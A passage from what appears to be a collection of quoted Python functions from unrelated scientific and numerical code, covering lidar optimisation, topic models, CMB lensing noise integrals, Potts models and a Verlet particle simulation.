+lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. 
T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). 
They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 
0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = 
docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. 
time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = 
sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. 
TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > 
r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of 
the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. 
You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, 